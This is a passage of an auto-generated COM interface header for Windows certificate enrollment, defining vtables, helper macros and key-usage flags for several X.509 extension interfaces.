            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        /* [helpstring][id][propget][custom] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByIndex )( 
            __RPC__in IX509Extensions * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt IX509Extension **pVal);
        
        /* [helpstring][id][propget][custom] */ HRESULT ( STDMETHODCALLTYPE *get_Count )( 
            __RPC__in IX509Extensions * This,
            /* [retval][out] */ __RPC__out long *pVal);
        
        /* [restricted][helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get__NewEnum )( 
            __RPC__in IX509Extensions * This,
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal);
        
        /* [helpstring][id][custom] */ HRESULT ( STDMETHODCALLTYPE *Add )( 
            __RPC__in IX509Extensions * This,
            /* [in] */ __RPC__in_opt IX509Extension *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Remove )( 
            __RPC__in IX509Extensions * This,
            /* [in] */ LONG Index);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Clear )( 
            __RPC__in IX509Extensions * This);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_IndexByObjectId )( 
            __RPC__in IX509Extensions * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [retval][out] */ __RPC__out LONG *pIndex);
        
        HRESULT ( STDMETHODCALLTYPE *AddRange )( 
            __RPC__in IX509Extensions * This,
            /* [in] */ __RPC__in_opt IX509Extensions *pValue);
        
        END_INTERFACE
    } IX509ExtensionsVtbl;

    interface IX509Extensions
    {
        CONST_VTBL struct IX509ExtensionsVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509Extensions_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509Extensions_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509Extensions_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509Extensions_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509Extensions_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509Extensions_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509Extensions_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509Extensions_get_ItemByIndex(This,Index,pVal)	\
    ( (This)->lpVtbl -> get_ItemByIndex(This,Index,pVal) ) 

#define IX509Extensions_get_Count(This,pVal)	\
    ( (This)->lpVtbl -> get_Count(This,pVal) ) 

#define IX509Extensions_get__NewEnum(This,pVal)	\
    ( (This)->lpVtbl -> get__NewEnum(This,pVal) ) 

#define IX509Extensions_Add(This,pVal)	\
    ( (This)->lpVtbl -> Add(This,pVal) ) 

#define IX509Extensions_Remove(This,Index)	\
    ( (This)->lpVtbl -> Remove(This,Index) ) 

#define IX509Extensions_Clear(This)	\
    ( (This)->lpVtbl -> Clear(This) ) 

#define IX509Extensions_get_IndexByObjectId(This,pObjectId,pIndex)	\
    ( (This)->lpVtbl -> get_IndexByObjectId(This,pObjectId,pIndex) ) 

#define IX509Extensions_AddRange(This,pValue)	\
    ( (This)->lpVtbl -> AddRange(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509Extensions_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0015 */
/* [local] */ 

typedef 
enum X509KeyUsageFlags
    {	XCN_CERT_NO_KEY_USAGE	= 0,
	XCN_CERT_DIGITAL_SIGNATURE_KEY_USAGE	= 0x80,
	XCN_CERT_NON_REPUDIATION_KEY_USAGE	= 0x40,
	XCN_CERT_KEY_ENCIPHERMENT_KEY_USAGE	= 0x20,
	XCN_CERT_DATA_ENCIPHERMENT_KEY_USAGE	= 0x10,
	XCN_CERT_KEY_AGREEMENT_KEY_USAGE	= 0x8,
	XCN_CERT_KEY_CERT_SIGN_KEY_USAGE	= 0x4,
	XCN_CERT_OFFLINE_CRL_SIGN_KEY_USAGE	= 0x2,
	XCN_CERT_CRL_SIGN_KEY_USAGE	= 0x2,
	XCN_CERT_ENCIPHER_ONLY_KEY_USAGE	= 0x1,
	XCN_CERT_DECIPHER_ONLY_KEY_USAGE	= ( 0x80 << 8 ) 
    } 	X509KeyUsageFlags;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0015_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0015_v0_0_s_ifspec;

#ifndef __IX509ExtensionKeyUsage_INTERFACE_DEFINED__
#define __IX509ExtensionKeyUsage_INTERFACE_DEFINED__

/* interface IX509ExtensionKeyUsage */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509ExtensionKeyUsage;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab30f-217d-11da-b2a4-000e7bbb2b09")
    IX509ExtensionKeyUsage : public IX509Extension
    {
    public:
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE InitializeEncode( 
            /* [in] */ X509KeyUsageFlags UsageFlags) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_KeyUsage( 
            /* [retval][out] */ __RPC__out X509KeyUsageFlags *pValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IX509ExtensionKeyUsageVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509ExtensionKeyUsage * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509ExtensionKeyUsage * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509ExtensionKeyUsage * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509ExtensionKeyUsage * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509ExtensionKeyUsage * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509ExtensionKeyUsage * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509ExtensionKeyUsage * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509ExtensionKeyUsage * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509ExtensionKeyUsage * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509ExtensionKeyUsage * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Critical )( 
            __RPC__in IX509ExtensionKeyUsage * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Critical )( 
            __RPC__in IX509ExtensionKeyUsage * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeEncode )( 
            __RPC__in IX509ExtensionKeyUsage * This,
            /* [in] */ X509KeyUsageFlags UsageFlags);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509ExtensionKeyUsage * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_KeyUsage )( 
            __RPC__in IX509ExtensionKeyUsage * This,
            /* [retval][out] */ __RPC__out X509KeyUsageFlags *pValue);
        
        END_INTERFACE
    } IX509ExtensionKeyUsageVtbl;

    interface IX509ExtensionKeyUsage
    {
        CONST_VTBL struct IX509ExtensionKeyUsageVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509ExtensionKeyUsage_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509ExtensionKeyUsage_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509ExtensionKeyUsage_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509ExtensionKeyUsage_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509ExtensionKeyUsage_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509ExtensionKeyUsage_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509ExtensionKeyUsage_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509ExtensionKeyUsage_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509ExtensionKeyUsage_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509ExtensionKeyUsage_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define IX509ExtensionKeyUsage_get_Critical(This,pValue)	\
    ( (This)->lpVtbl -> get_Critical(This,pValue) ) 

#define IX509ExtensionKeyUsage_put_Critical(This,Value)	\
    ( (This)->lpVtbl -> put_Critical(This,Value) ) 


#define IX509ExtensionKeyUsage_InitializeEncode(This,UsageFlags)	\
    ( (This)->lpVtbl -> InitializeEncode(This,UsageFlags) ) 

#define IX509ExtensionKeyUsage_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define IX509ExtensionKeyUsage_get_KeyUsage(This,pValue)	\
    ( (This)->lpVtbl -> get_KeyUsage(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509ExtensionKeyUsage_INTERFACE_DEFINED__ */


#ifndef __IX509ExtensionEnhancedKeyUsage_INTERFACE_DEFINED__
#define __IX509ExtensionEnhancedKeyUsage_INTERFACE_DEFINED__

/* interface IX509ExtensionEnhancedKeyUsage */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509ExtensionEnhancedKeyUsage;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab310-217d-11da-b2a4-000e7bbb2b09")
    IX509ExtensionEnhancedKeyUsage : public IX509Extension
    {
    public:
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE InitializeEncode( 
            /* [in] */ __RPC__in_opt IObjectIds *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_EnhancedKeyUsage( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IX509ExtensionEnhancedKeyUsageVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509ExtensionEnhancedKeyUsage * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509ExtensionEnhancedKeyUsage * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509ExtensionEnhancedKeyUsage * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509ExtensionEnhancedKeyUsage * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509ExtensionEnhancedKeyUsage * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509ExtensionEnhancedKeyUsage * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509ExtensionEnhancedKeyUsage * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509ExtensionEnhancedKeyUsage * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509ExtensionEnhancedKeyUsage * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509ExtensionEnhancedKeyUsage * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Critical )( 
            __RPC__in IX509ExtensionEnhancedKeyUsage * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Critical )( 
            __RPC__in IX509ExtensionEnhancedKeyUsage * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeEncode )( 
            __RPC__in IX509ExtensionEnhancedKeyUsage * This,
            /* [in] */ __RPC__in_opt IObjectIds *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509ExtensionEnhancedKeyUsage * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EnhancedKeyUsage )( 
            __RPC__in IX509ExtensionEnhancedKeyUsage * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue);
        
        END_INTERFACE
    } IX509ExtensionEnhancedKeyUsageVtbl;

    interface IX509ExtensionEnhancedKeyUsage
    {
        CONST_VTBL struct IX509ExtensionEnhancedKeyUsageVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509ExtensionEnhancedKeyUsage_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509ExtensionEnhancedKeyUsage_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509ExtensionEnhancedKeyUsage_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509ExtensionEnhancedKeyUsage_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509ExtensionEnhancedKeyUsage_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509ExtensionEnhancedKeyUsage_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509ExtensionEnhancedKeyUsage_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509ExtensionEnhancedKeyUsage_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509ExtensionEnhancedKeyUsage_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509ExtensionEnhancedKeyUsage_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define IX509ExtensionEnhancedKeyUsage_get_Critical(This,pValue)	\
    ( (This)->lpVtbl -> get_Critical(This,pValue) ) 

#define IX509ExtensionEnhancedKeyUsage_put_Critical(This,Value)	\
    ( (This)->lpVtbl -> put_Critical(This,Value) ) 


#define IX509ExtensionEnhancedKeyUsage_InitializeEncode(This,pValue)	\
    ( (This)->lpVtbl -> InitializeEncode(This,pValue) ) 

#define IX509ExtensionEnhancedKeyUsage_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define IX509ExtensionEnhancedKeyUsage_get_EnhancedKeyUsage(This,ppValue)	\
    ( (This)->lpVtbl -> get_EnhancedKeyUsage(This,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509ExtensionEnhancedKeyUsage_INTERFACE_DEFINED__ */


#ifndef __IX509ExtensionTemplateName_INTERFACE_DEFINED__
#define __IX509ExtensionTemplateName_INTERFACE_DEFINED__

/* interface IX509ExtensionTemplateName */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509ExtensionTemplateName;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab311-217d-11da-b2a4-000e7bbb2b09")
    IX509ExtensionTemplateName : public IX509Extension
    {
    public:
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE InitializeEncode( 
            /* [in] */ __RPC__in BSTR strTemplateName) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_TemplateName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IX509ExtensionTemplateNameVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509ExtensionTemplateName * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509ExtensionTemplateName * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509ExtensionTemplateName * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509ExtensionTemplateName * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509ExtensionTemplateName * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509ExtensionTemplateName * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509ExtensionTemplateName * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509ExtensionTemplateName * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509ExtensionTemplateName * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509ExtensionTemplateName * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Critical )( 
            __RPC__in IX509ExtensionTemplateName * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Critical )( 
            __RPC__in IX509ExtensionTemplateName * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeEncode )( 
            __RPC__in IX509ExtensionTemplateName * This,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509ExtensionTemplateName * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_TemplateName )( 
            __RPC__in IX509ExtensionTemplateName * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IX509ExtensionTemplateNameVtbl;

    interface IX509ExtensionTemplateName
    {
        CONST_VTBL struct IX509ExtensionTemplateNameVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509ExtensionTemplateName_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509ExtensionTemplateName_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509ExtensionTemplateName_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509ExtensionTemplateName_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509ExtensionTemplateName_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509ExtensionTemplateName_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509ExtensionTemplateName_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509ExtensionTemplateName_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509ExtensionTemplateName_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509ExtensionTemplateName_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define IX509ExtensionTemplateName_get_Critical(This,pValue)	\
    ( (This)->lpVtbl -> get_Critical(This,pValue) ) 

#define IX509ExtensionTemplateName_put_Critical(This,Value)	\
    ( (This)->lpVtbl -> put_Critical(This,Value) ) 


#define IX509ExtensionTemplateName_InitializeEncode(This,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeEncode(This,strTemplateName) ) 

#define IX509ExtensionTemplateName_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define IX509ExtensionTemplateName_get_TemplateName(This,pValue)	\
    ( (This)->lpVtbl -> get_TemplateName(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509ExtensionTemplateName_INTERFACE_DEFINED__ */


#ifndef __IX509ExtensionTemplate_INTERFACE_DEFINED__
#define __IX509ExtensionTemplate_INTERFACE_DEFINED__

/* interface IX509ExtensionTemplate */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509ExtensionTemplate;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab312-217d-11da-b2a4-000e7bbb2b09")
    IX509ExtensionTemplate : public IX509Extension
    {
    public:
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE InitializeEncode( 
            /* [in] */ __RPC__in_opt IObjectId *pTemplateOid,
            /* [in] */ LONG MajorVersion,
            /* [in] */ LONG MinorVersion) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_TemplateOid( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_MajorVersion( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_MinorVersion( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IX509ExtensionTemplateVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509ExtensionTemplate * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509ExtensionTemplate * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509ExtensionTemplate * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509ExtensionTemplate * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509ExtensionTemplate * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509ExtensionTemplate * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
